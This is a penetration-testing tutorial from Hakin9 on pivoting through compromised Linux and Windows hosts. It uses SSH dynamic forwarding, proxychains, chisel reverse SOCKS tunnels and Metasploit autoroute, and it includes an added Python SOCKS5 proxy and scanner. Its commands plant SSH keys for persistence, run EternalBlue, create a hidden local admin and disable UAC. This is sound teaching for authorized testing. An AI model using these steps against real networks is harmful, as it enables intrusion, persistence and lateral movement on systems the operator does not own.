The shades of tunneling

Solution for common pivoting problems during a Penetration Test

by Karol Mazurek


SCENARIO I

You have gained root on a Linux server (10.10.10.2) and run host discovery in an internal network (123.123.123.0/24) that only this compromised host can reach. Now you want to pivot through it. How do you do that quickly?

1.1. SSH & PROXYCHAINS

### ON YOUR MACHINE (10.10.10.1)
# CREATE A DIRECTORY FOR MANAGING KEYS
mkdir piv_keys && chmod 700 piv_keys
# GENERATE A NEW SSH KEY PAIR FOR THIS PIVOT
ssh-keygen -f piv_keys/id_rsa_1
# COPY THE PUBLIC KEY (.pub) TO THE CLIPBOARD - NEVER THE PRIVATE KEY
cat piv_keys/id_rsa_1.pub | clip.exe # OR JUST CAT AND COPY
### ON A COMPROMISED MACHINE (10.10.10.2)
# ADD YOUR SSH PUBLIC KEY TO authorized_keys
mkdir -p /root/.ssh && chmod 700 /root/.ssh
echo "ssh-rsa AAAA...[REDACTED]..." >> /root/.ssh/authorized_keys
# sshd (StrictModes) IGNORES THE FILE IF IT IS GROUP- OR WORLD-WRITABLE
chmod 600 /root/.ssh/authorized_keys
### ON YOUR HOST (10.10.10.1)
# START SSH DYNAMIC PORT FORWARDING: A SOCKS LISTENER ON 127.0.0.1:9999 WHOSE CONNECTIONS EXIT ON 10.10.10.2
ssh -i piv_keys/id_rsa_1 -D 127.0.0.1:9999 -f -N root@10.10.10.2

### ON YOUR HOST (10.10.10.1)
# CONFIGURE PROXYCHAINS (/etc/proxychains4.conf)
# KEEP strict_chain AND REPLACE THE DEFAULT tor ENTRY (socks4 127.0.0.1 9050) WITH THE SSH LISTENER

[ProxyList]
# add proxy here ...
# meanwhile
# defaults set to "tor"
socks5 127.0.0.1 9999

After adding the above line to the config file (and removing the default tor entry, otherwise strict_chain tries to go through 127.0.0.1:9050 first), you can prefix any dynamically linked tool with proxychains. Two things to keep in mind: a SOCKS proxy carries only TCP connections, so port scans through it must be TCP connect scans without ping discovery (nmap -sT -Pn), and with proxy_dns (on by default in proxychains4.conf) host names are resolved through the pivot rather than from your machine.

How does ProxyChains actually work?

ProxyChains is a UNIX program that hooks the network-related libc functions (connect, getaddrinfo and friends) of dynamically linked programs through a preloaded shared library (LD_PRELOAD) and redirects the connections through SOCKS4/5 or HTTP proxies. That is also its limit: statically linked binaries and programs that do not use libc for networking (Go binaries, tools working with raw sockets) are not proxied and silently talk to the network directly.

1. When you create the SSH tunnel between your starting machine (10.10.10.1) and the remote server (10.10.10.2) to reach the internal network (123.123.123.0/24), ssh additionally opens a TCP socket on port 9999 locally (127.0.0.1) and speaks SOCKS5 on it.

2. So you need some way to hand your tools' connections to this socket (127.0.0.1:9999), which is in fact a SOCKS proxy whose connections exit on 10.10.10.2 through the SSH tunnel, and that is where ProxyChains comes in: the hooked connect() performs the SOCKS handshake with 127.0.0.1:9999, and the proxy end (sshd on 10.10.10.2) opens the real connection to the internal target.
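The two steps above, as an added example that is not part of the original article: a minimal SOCKS5 proxy standing in for the `ssh -D 9999` listener, the client-side handshake that proxychains performs inside the hooked connect(), and a connect scan built on it. Everything runs on 127.0.0.1 with ports allocated at runtime (constructed input), so the "internal service" and the "closed port" are stand-ins for hosts in 123.123.123.0/24; no real pivot host is involved, and all function names are the example's own.

```python
"""SOCKS5 CONNECT as spoken between a hooked tool and the `ssh -D` listener (added example, not the article's code)."""
import contextlib, socket, struct, threading

VER, CMD_CONNECT, ATYP_IPV4 = 0x05, 0x01, 0x01
REPLY = {0: "succeeded", 1: "general failure", 3: "network unreachable", 4: "host unreachable", 5: "connection refused", 7: "command not supported"}

def _recv_exact(sock, n):  # recv() may return short reads; the handshake needs exact byte counts
    buf = b""
    while len(buf) < n and (chunk := sock.recv(n - len(buf))):
        buf += chunk
    if len(buf) < n:
        raise ConnectionError("peer closed mid-handshake")
    return buf

def _reply(sock, code):  # VER REP RSV ATYP BND.ADDR(4) BND.PORT(2); ssh -D also answers 0.0.0.0:0
    sock.sendall(bytes([VER, code, 0x00, ATYP_IPV4]) + b"\x00" * 6)

def _pipe(src, dst):  # one direction of the blind relay; pass EOF on as a half-close
    try:
        for data in iter(lambda: src.recv(4096), b""):
            dst.sendall(data)
    except OSError:
        pass
    finally:
        with contextlib.suppress(OSError):
            dst.shutdown(socket.SHUT_WR)

def serve_one(client):
    """Proxy side of one CONNECT (stand-in for ssh -D): the destination socket is
    opened HERE, on the pivot, so an unreachable target is a reply code, not a local error."""
    with client:
        ver, nmethods = _recv_exact(client, 2)
        if ver != VER or 0x00 not in _recv_exact(client, nmethods):  # no-auth only, like ssh -D
            return client.sendall(bytes([VER, 0xFF]))
        client.sendall(bytes([VER, 0x00]))
        _ver, cmd, _rsv, atyp = _recv_exact(client, 4)
        if cmd != CMD_CONNECT or atyp != ATYP_IPV4:
            return _reply(client, 0x07)
        host, port = socket.inet_ntoa(_recv_exact(client, 4)), struct.unpack("!H", _recv_exact(client, 2))[0]
        try:
            upstream = socket.create_connection((host, port), timeout=3)
        except OSError as e:
            return _reply(client, 0x05 if isinstance(e, ConnectionRefusedError) else 0x04)
        with upstream:
            upstream.settimeout(None)
            _reply(client, 0x00)
            back = threading.Thread(target=_pipe, args=(upstream, client), daemon=True)
            back.start()
            _pipe(client, upstream)
            back.join()

def socks5_connect(proxy, target):
    """Client side, i.e. what proxychains does inside the hooked connect(): (reply_code, socket_or_None)."""
    s = socket.create_connection(proxy, timeout=5)
    s.sendall(bytes([VER, 0x01, 0x00]))  # greeting: one method offered, no-auth
    if _recv_exact(s, 2) != bytes([VER, 0x00]):
        s.close()
        raise ConnectionError("proxy refused no-auth")
    s.sendall(bytes([VER, CMD_CONNECT, 0x00, ATYP_IPV4])
              + socket.inet_aton(target[0]) + struct.pack("!H", target[1]))
    rep = _recv_exact(s, 10)[1]  # 10-byte IPv4 reply assumed, as _reply sends
    if rep != 0:
        s.close()
        return rep, None
    s.settimeout(None)  # on success the socket is already 'at' target
    return rep, s

def send_through_proxy(proxy, target, payload):  # send, half-close, read the answer to EOF
    rep, s = socks5_connect(proxy, target)
    if s is None:
        return rep, b""
    with s:
        s.sendall(payload)
        s.shutdown(socket.SHUT_WR)
        return rep, b"".join(iter(lambda: s.recv(4096), b""))

def connect_scan(proxy, host, ports):
    """Connect scan through the pivot: all `proxychains nmap -sT -Pn` can do, since SOCKS carries TCP CONNECT only."""
    return {p: REPLY.get(send_through_proxy(proxy, (host, p), b"")[0], "other") for p in ports}

def listen_background(handler):  # bind a free loopback port (constructed), one thread per connection
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(16)
    def loop():
        while True:
            threading.Thread(target=handler, args=(srv.accept()[0],), daemon=True).start()
    threading.Thread(target=loop, daemon=True).start()
    return srv.getsockname()[1]

def start_internal_service():  # constructed stand-in for a host in 123.123.123.0/24: read to EOF, echo with a tag
    def echo(conn):
        with conn:
            conn.sendall(b"internal:" + b"".join(iter(lambda: conn.recv(4096), b"")))
    return listen_background(echo)

def pick_closed_port():  # constructed closed port: bind a free one and release it immediately
    with socket.socket() as tmp:
        tmp.bind(("127.0.0.1", 0))
        return tmp.getsockname()[1]
```

Start the proxy with listen_background(serve_one) and point socks5_connect at ("127.0.0.1", port). Two things are worth noticing: a closed port on the target comes back as SOCKS reply 0x05 from the proxy, not as a local connection error in the tool (proxychains shows this as a denied connection in its output), and the scan can only distinguish open from refused because SOCKS carries CONNECT alone, which is why nmap -sT -Pn is the only nmap mode that makes sense through this tunnel.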

1.2. METASPLOIT & AUTOROUTE & PORTFWD

 

### ON YOUR HOST IN MSFCONSOLE (10.10.10.1)
# PIVOT USING THE ROUTE COMMAND (SESSION 2 IS THE METERPRETER ON 10.10.10.2)
route add 123.123.123.0/24 2
# PIVOT USING AUTOROUTE
use post/multi/manage/autoroute
set session 2
run
# PIVOT USING AUTOROUTE FROM INSIDE THE METERPRETER SESSION
meterpreter> run autoroute -s 123.123.123.0/24
meterpreter> run autoroute -p

  • Now Metasploit modules will "automagically" pivot through the compromised host to the target systems in the internal network (123.123.123.0/24). This applies to Metasploit modules only; external tools still need the SSH/ProxyChains path from 1.1 (or auxiliary/server/socks_proxy started on top of the route).
  • For example, you found that 123.123.123.4 is vulnerable to MS17-010 EternalBlue. To exploit it, just run the proper module and set it up as if the target were in your own subnet:

 

### ON YOUR HOST IN MSFCONSOLE (10.10.10.1)
# EXPLOIT MS17-010 EternalBlue THROUGH THE ROUTE
use exploit/windows/smb/ms17_010_psexec
set RHOSTS 123.123.123.4
# 123.123.123.4 HAS NO ROUTE BACK TO 10.10.10.1, SO A REVERSE PAYLOAD WITH LHOST 10.10.10.1 NEVER CONNECTS BACK:
# USE A BIND PAYLOAD (METASPLOIT CONNECTS TO IT THROUGH THE PIVOT)
set PAYLOAD windows/x64/meterpreter/bind_tcp
run
  • Another example, if you want to conduct a TCP connect scan over the subnet 123.123.123.0/24:

### ON YOUR HOST IN MSFCONSOLE (10.10.10.1)
# CONDUCT A TCP CONNECT SCAN THROUGH THE ROUTE
use auxiliary/scanner/portscan/tcp
set RHOSTS 123.123.123.0/24
set PORTS 1-1024
set THREADS 50
run

  • If you want to connect with RDP using the Metasploit Framework as a tunnel:

### IN THE METERPRETER SESSION ON THE PIVOT: FORWARD LOCALHOST:3389 TO 123.123.123.1:3389
meterpreter> portfwd add -l 3389 -p 3389 -r 123.123.123.1
### ON YOUR HOST (10.10.10.1): CONNECT USING THE TUNNEL
rdesktop 127.0.0.1:3389

SCENARIO II

You have managed to pivot through the compromised host (123.123.123.2, the internal interface of 10.10.10.2) and gained a low-privileged user CRIMSON\bofer on the Windows server 123.123.123.3. While investigating the newly compromised host, you found a buffer overflow in printer.exe (a service listening on 127.0.0.1:4444) that can be leveraged for privilege escalation to NT AUTHORITY\SYSTEM. You downloaded the vulnerable printer.exe to your machine and developed an exploit. How do you send it from your host (10.10.10.1) to the printer.exe service on the Windows server (123.123.123.3), which listens only on the loopback interface (127.0.0.1:4444)?

  • This time there is no way to use an SSH server on the target (Windows system 123.123.123.3), since no SSH server is preinstalled and you have no privileges to install one.
  • In such a situation a good option is chisel.exe with a reverse port forward: the target itself pushes its loopback port out to your chisel server. The chisel client on 123.123.123.3 must be able to reach the chisel server port; if the internal segment has no route to 10.10.10.1, publish the server port on the first jump host instead (for example with an SSH remote forward on 10.10.10.2, which needs GatewayPorts enabled in its sshd) and point the client at 123.123.123.2. Note that proxychains does not help on the server side: it only hooks outgoing connect() calls, and a listener makes none.
### ON YOUR HOST (10.10.10.1)
# START THE CHISEL SERVER ON PORT 8000 AND ALLOW CLIENTS TO REQUEST REVERSE FORWARDS
chisel server -p 8000 --reverse
# LEAVE PORT 4000 FREE: CHISEL BINDS IT ON YOUR HOST WHEN THE CLIENT CONNECTS,
# SO DO NOT PARK A NETCAT LISTENER THERE
### ON A COMPROMISED MACHINE (123.123.123.3)
# START THE CHISEL CLIENT: REVERSE FORWARD <server>:4000 -> 127.0.0.1:4444 ON THIS HOST
chisel.exe client 10.10.10.1:8000 R:4000:127.0.0.1:4444

  • Now, to exploit the buffer overflow in the service that is reachable only at 127.0.0.1:4444 on 123.123.123.3, run your exploit from 10.10.10.1 against 127.0.0.1:4000 on your own host: chisel carries every byte to the loopback service on the target. If the exploit payload is a reverse shell, remember that the target has the same routing problem, so use a bind payload or forward the callback port the same way.

SCENARIO III

You have gained NT AUTHORITY\SYSTEM on another Windows server (123.123.123.4) through MS17-010 EternalBlue, and during post-exploitation pillaging you found in the browser history of the user CRIMSON\karmaz that he had been connecting to a website at http://123.123.124.2:80/blog. That is why you ran host discovery on the adjacent network segment (123.123.124.0/24) and found one new host in this subnet: 123.123.124.3. Now, how do you proxy traffic to this newly found host from your starting machine (10.10.10.1)?

3.1. OpenSSH & PROXYCHAINS

  • Since you have NT AUTHORITY\SYSTEM, you can install anything you want on the compromised Windows server.
  • In such a scenario OpenSSH comes in handy; install it if it is not available (it ships as an optional feature on Windows 10 1809+ and Windows Server 2019+, otherwise use the release from GitHub).
### ON COMPROMISED HOST USING METERPRETER SESSION (123.123.123.4)
## GUIDE USING RDP:
# TURN ON RDP ON THE COMPROMISED MACHINE
run getgui -e
# ADD A USER IF THERE IS NONE
run getgui -u karmazRDP -p karmaz!RDP123
# THE USER SHOULD BE IN THE LOCAL ADMINISTRATORS GROUP; IF NOT, ADD HIM
shell
net localgroup administrators karmazRDP /add
### ON YOUR HOST (10.10.10.1)
# CONNECT OVER PROXYCHAINS & RDP USING THE PREVIOUS TUNNEL (LOCAL ACCOUNT, SO NO DOMAIN PREFIX)
proxychains xfreerdp /u:karmazRDP /p:karmaz\!RDP123 /v:123.123.123.4
### ON COMPROMISED HOST IN THE RDP WINDOW (POWERSHELL)
# DOWNLOAD latest release of OpenSSH: LINK
# INSTALL OpenSSH instructions: LINK
# START sshd (ssh-agent IS NOT NEEDED FOR INBOUND LOGINS; IT ONLY SERVES OUTBOUND SSH FROM THIS BOX)
Start-Service sshd
# GENERATE A NEW KEY PAIR (OR REUSE THE piv_keys PAIR FROM SCENARIO I: ONLY ITS PUBLIC HALF HAS TO LAND HERE)
ssh-keygen
# ADD THE PUBLIC KEY TO administrators_authorized_keys
# copy the content of ~\.ssh\id_rsa.pub
# and append it to C:\ProgramData\ssh\administrators_authorized_keys
  • The tricky part: the default sshd_config ends with a Match Group administrators block, so if the user you log in as belongs to the local Administrators group, his public key has to be in C:\ProgramData\ssh\administrators_authorized_keys, not in C:\Users\<username>\.ssh\authorized_keys.
  • Another common problem is wrong permissions on that file (sshd ignores it unless only SYSTEM and Administrators have access), which you can fix with the PowerShell script below:
### ON COMPROMISED HOST IN POWERSHELL (123.123.123.4)
# RESTRICT administrators_authorized_keys TO SYSTEM AND Administrators (INHERITANCE OFF)
$acl = Get-Acl C:\ProgramData\ssh\administrators_authorized_keys
$acl.SetAccessRuleProtection($true, $false)
$administratorsRule = New-Object system.security.accesscontrol.filesystemaccessrule("Administrators","FullControl","Allow")
$systemRule = New-Object system.security.accesscontrol.filesystemaccessrule("SYSTEM","FullControl","Allow")
$acl.SetAccessRule($administratorsRule)
$acl.SetAccessRule($systemRule)
$acl | Set-Acl

  • If you install OpenSSH from the command line and an interactive UAC prompt blocks the installer (a prompt you cannot answer from a shell, even when the shell runs as NT AUTHORITY\SYSTEM), one workaround is to switch UAC off. Try the install from the SYSTEM shell itself first (the SYSTEM token is not subject to UAC filtering, and on Windows 10 1809+/Server 2019+ the optional feature can be added with Add-WindowsCapability): the registry change below is system-wide, noisy, requires a reboot that drops your sessions, and should be reverted (EnableLUA back to 1) when you are done.
## GUIDE USING COMMAND LINE (WITHOUT RDESKTOP)
# SET UAC TO 0 (EnableLUA)
C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
# REBOOT THE SYSTEM
shutdown /r
# RE-ESTABLISH THE METERPRETER SESSION AND FOLLOW THE RDP STEPS FROM ABOVE
  • To tunnel from 10.10.10.1 over 10.10.10.2 and 123.123.123.4 into the 123.123.124.0/24 subnet, use ProxyJump (-J). The ssh client on 10.10.10.1 logs in to 10.10.10.2 with the Scenario I key, opens a forwarded TCP channel through it to 123.123.123.4:22, and authenticates to 123.123.123.4 end to end from your host. So the private key whose public half is in administrators_authorized_keys is needed on the starting host only; it does not have to be on the first jump host, and leaving a private key on a compromised box should be avoided anyway.
### ON THE SECOND JUMP HOST - 123.123.123.4
# IF YOU GENERATED THE PAIR HERE, COPY THE PRIVATE KEY (CONTENT OF ~\.ssh\id_rsa) BACK TO THE STARTING HOST
### ON THE STARTING HOST - 10.10.10.1
# MAKE A BACKUP OF THE OLD PRIVATE KEY AND PUBLIC KEY
cp ~/.ssh/id_rsa ~/.ssh/id_rsa.bck
cp ~/.ssh/id_rsa.pub ~/.ssh/id_rsa.pub.bck
# PASTE THE COPIED PRIVATE KEY FROM 123.123.123.4 INTO ~/.ssh/id_rsa
# SET CORRECT PERMISSIONS
chmod 600 ~/.ssh/id_rsa
# REGENERATE THE MATCHING PUBLIC KEY FILE
ssh-keygen -y -f ~/.ssh/id_rsa > ~/.ssh/id_rsa.pub
# THE FIRST HOP NEEDS piv_keys/id_rsa_1: -i ON THE COMMAND LINE APPLIES TO THE FINAL DESTINATION ONLY,
# SO LOAD THAT KEY INTO THE AGENT (OR PUT IT IN AN ssh_config Host ENTRY FOR 10.10.10.2)
eval "$(ssh-agent -s)" && ssh-add piv_keys/id_rsa_1
# CREATE THE TUNNEL: SOCKS LISTENER ON 127.0.0.1:9999 WHOSE CONNECTIONS EXIT ON 123.123.123.4
ssh -J root@10.10.10.2 karmazRDP@123.123.123.4 -N -f -D 9999
  • The public key file has to be regenerated because ssh reads ~/.ssh/id_rsa.pub to decide which key to offer; a stale id_rsa.pub from the old pair does not match the new id_rsa, and authentication with that identity fails.
  • Now you can use this tunnel via ProxyChains as in Scenario I (the same socks5 127.0.0.1 9999 entry), and packets will be tunneled from the starting machine (10.10.10.1) to any host in the 123.123.124.0/24 subnet. If the -D 9999 tunnel from Scenario I is still running, stop it first or pick another port.

3.2. CHISEL & PROXYCHAINS

  • The OpenSSH approach above is more persistent and stable, but it takes more time to set up, and administrator privileges are needed if sshd is not preinstalled and enabled.
  • A quick way to achieve the same goal is to set up reverse SOCKS proxies with chisel (chisel.elf on the Linux jump host, chisel.exe on the Windows one).
### ON THE STARTING HOST - 10.10.10.1 (INSIDE A CLONE OF THE chisel REPOSITORY)
# BUILD chisel FOR THE FIRST JUMP HOST - 10.10.10.2 (LINUX, amd64)
GOOS=linux GOARCH=amd64 go build -ldflags="-s -w" .
# BUILD chisel.exe FOR THE SECOND JUMP HOST - 123.123.123.4 (WINDOWS; A 386 BUILD RUNS ON 32- AND 64-BIT)
GOOS=windows GOARCH=386 go build -ldflags="-s -w" .
# UPLOAD BOTH BINARIES TO THE FIRST JUMP HOST - 10.10.10.2 (chisel.exe IS STAGED THERE FOR THE NEXT HOP)
scp -i piv_keys/id_rsa_1 chisel root@10.10.10.2:/root/chisel
scp -i piv_keys/id_rsa_1 chisel.exe root@10.10.10.2:/root/chisel.exe
# OR DOWNLOAD THE APPROPRIATE VERSION FROM THE RELEASE PAGE
# https://github.com/jpillora/chisel/releases
# START THE CHISEL SERVER ON 9001, ALLOWING CLIENTS TO REQUEST REVERSE SOCKS
./chisel server --socks5 --reverse -p 9001
### ON THE FIRST JUMP HOST - 10.10.10.2
# CONNECT TO THE SERVER: 10.10.10.1 NOW LISTENS ON PORT 9998 AS A SOCKS PROXY WHOSE CONNECTIONS EXIT HERE
./chisel client 10.10.10.1:9001 R:9998:socks &
# START A SECOND CHISEL SERVER ON 9002 FOR THE SECOND JUMP HOST - 123.123.123.4
./chisel server --socks5 --reverse -p 9002 &
### ON THE SECOND JUMP HOST - 123.123.123.4
# UPLOAD chisel.exe (E.G. WITH THE upload COMMAND OF THE METERPRETER SESSION) AND RUN THE CLIENT:
# 10.10.10.2 NOW LISTENS ON PORT 8888 AS A SOCKS PROXY WHOSE CONNECTIONS EXIT HERE
.\chisel.exe client 123.123.123.2:9002 R:8888:socks
  • At the end edit the ProxyChains configuration file so that it chains the two SOCKS listeners in order (strict_chain): first 127.0.0.1:9998 on your host, then port 8888, which proxychains reaches through the first hop, so the 127.0.0.1 in that second entry is the loopback of 10.10.10.2. Remove the Scenario I entry (socks5 127.0.0.1 9999) from the list, or keep it in a separate config file selected with proxychains4 -f.

  • Now you can access the subnet 123.123.123.0/24 (first entry alone is enough) and the subnet 123.123.124.0/24 (both entries) from your starting host 10.10.10.1 using ProxyChains.
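The configuration the two chisel commands above call for, as an added example reconstructed from them rather than taken from the original article (it assumes the default strict_chain mode and the two listener ports 9998 and 8888 used above; comments are kept on their own lines because proxychains parses a ProxyList entry as "type host port [user pass]"):

```ini
# /etc/proxychains4.conf on 10.10.10.1 (added example, not the article's own file)
# proxies are used in list order; each hop is reached through the previous one
strict_chain
# resolve names at the last hop, not on 10.10.10.1
proxy_dns
tcp_read_time_out 15000
tcp_connect_time_out 8000

[ProxyList]
# hop 1: chisel reverse SOCKS on this host (port 9998); connections exit on 10.10.10.2 / 123.123.123.2
socks5 127.0.0.1 9998
# hop 2: reached THROUGH hop 1, so this 127.0.0.1 is the loopback of 10.10.10.2;
#        its port 8888 is the reverse SOCKS whose connections exit on 123.123.123.4
socks5 127.0.0.1 8888
# the Scenario I entry (socks5 127.0.0.1 9999) must not stay in this list,
# or strict_chain would insert it as a third hop
```

Use it as proxychains4 -f /path/to/this.conf nmap -sT -Pn 123.123.124.3; for targets in 123.123.123.0/24 a file with only the first entry is enough, because proxychains has no per-destination routing and always walks the whole chain.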

3.3. METASPLOIT & AUTOROUTE

  • You can use Metasploit if you managed to establish a meterpreter session with 123.123.123.4 (session 3, opened through the Scenario I route).
  • You can use this session for the second pivot to reach systems in the 123.123.124.0/24 subnet.
### ON YOUR HOST IN MSFCONSOLE (10.10.10.1)
# PIVOT USING THE ROUTE COMMAND
route add 123.123.124.0/24 3
# PIVOT USING AUTOROUTE
use post/multi/manage/autoroute
set session 3
run
# PIVOT USING AUTOROUTE FROM INSIDE THE METERPRETER SESSION
meterpreter> run autoroute -s 123.123.124.0/24
meterpreter> run autoroute -p
  • The Metasploit modules will "automagically" pivot through the first jump host (10.10.10.2, session 2) and then through the second one (123.123.123.4, session 3) to access the internal network (123.123.124.0/24): session 3 itself runs over the route through session 2, so the pivots nest. Check the result with route print, which lists each subnet and the session it is bound to.

May 13, 2022

© HAKIN9 MEDIA SP. Z O.O. SP. K. 2013